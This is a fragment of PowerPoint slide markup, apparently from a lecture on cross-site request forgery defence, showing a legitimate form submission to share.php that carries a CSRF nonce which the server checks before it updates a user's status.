            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1453768" y="3358349"/>
              <a:ext cx="414185" cy="414185"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514599" y="1200086"/>
              <a:ext cx="3733800" cy="1158875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3733800" h="1158875">
                  <a:moveTo>
                    <a:pt x="0" y="1158430"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3733800" y="1158430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3733800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1158430"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="385D89"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8831073" y="3595793"/>
            <a:ext cx="2920153" cy="2203027"/>
            <a:chOff x="6623304" y="2696845"/>
            <a:chExt cx="2190115" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>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5" name="object 15"/>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6" name="object 16"/>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17" name="object 17"/>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18" name="object 18"/>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19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="4236720" cy="1452880"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="3177540" cy="1089660"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>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1" name="object 21"/>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2" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705988" y="227862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3" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705988" y="227862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4" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3614335" y="3062731"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 2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5" name="object 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454400" y="2572528"/>
            <a:ext cx="4775200" cy="265949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F1F1F1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="39793" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="122764">
              <a:spcBef>
                <a:spcPts val="313"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type="hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name="csrfnonce"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>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128" y="450638"/>
            <a:ext cx="4804833" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Case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233576" y="4097799"/>
            <a:ext cx="1715347" cy="1434111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4233" algn="ctr">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16086" marR="6773" indent="-847" algn="ctr">
              <a:spcBef>
                <a:spcPts val="47"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>update user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>status with the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-867" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>text </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“Feeling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>good!” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>checking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-40" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nonce</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1816607" y="2084663"/>
            <a:ext cx="7378700" cy="2885440"/>
            <a:chOff x="1362455" y="1563497"/>
            <a:chExt cx="5534025" cy="216408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0" name="object 20"/>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1" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2739516"/>
              <a:ext cx="3886200" cy="975360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="975360">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="975232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517011" y="975232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="606044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6031610" y="3345561"/>
              <a:ext cx="369570" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="369570" h="369570">
                  <a:moveTo>
                    <a:pt x="369188" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73913" y="73913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369188" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2739516"/>
              <a:ext cx="3886200" cy="975360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="975360">
                  <a:moveTo>
                    <a:pt x="3517011" y="975232"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3590925" y="679957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="606044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517011" y="975232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="975232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="606044"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4514087" y="3650827"/>
            <a:ext cx="2855807" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="323419" marR="314105" indent="847" algn="ctr">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text=Feeling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-100" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Good!</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>csrfnonce=av834favcb623</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4806391"/>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26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="4806392"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="320031">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Share”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6019800" y="4546601"/>
            <a:ext cx="2413000" cy="1490980"/>
            <a:chOff x="4514850" y="3409950"/>
            <a:chExt cx="1809750" cy="1118235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876800" y="3409950"/>
              <a:ext cx="1041895" cy="804557"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4514850" y="4189348"/>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0" name="object 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="5585798"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10446851" y="1144185"/>
            <a:ext cx="1303867" cy="1722967"/>
            <a:chOff x="7835138" y="858138"/>
            <a:chExt cx="977900" cy="1292225"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="989964"/>
              <a:ext cx="952500" cy="1148080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="1148080">
                  <a:moveTo>
                    <a:pt x="952500" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="932335" y="34392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="64824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="78098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="89832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="99843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="107949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="113965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="117710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="118999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="117710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="113965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="107949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="99843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="89832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="78098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="64824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="34392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="1063092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="1093524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="1118532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="1128543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="1136649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="1142665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1146410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="1147699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1146410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="1142665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="1136649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="1128543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="1118532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="1093524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="1063092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BC"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="870838"/>
              <a:ext cx="952500" cy="238125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="238125">
                  <a:moveTo>
                    <a:pt x="476250" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="405875" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76728" y="54263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20164" y="84722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5163" y="136725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44265" y="169320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116819" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163798" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216930" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275478" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338705" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405875" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="238125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="236836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="233091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="227075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="218969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="208958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="197224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="183950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="932335" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952500" y="119125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947336" y="101523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908234" y="68907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="835680" y="40972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788701" y="29221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735569" y="19193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677021" y="11072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613794" y="5044"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546624" y="1291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="476250" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="94B3D6"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7847838" y="870838"/>
              <a:ext cx="952500" cy="1266825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="952500" h="1266825">
                  <a:moveTo>
                    <a:pt x="952500" y="119125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="932335" y="153518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875771" y="183950"/>
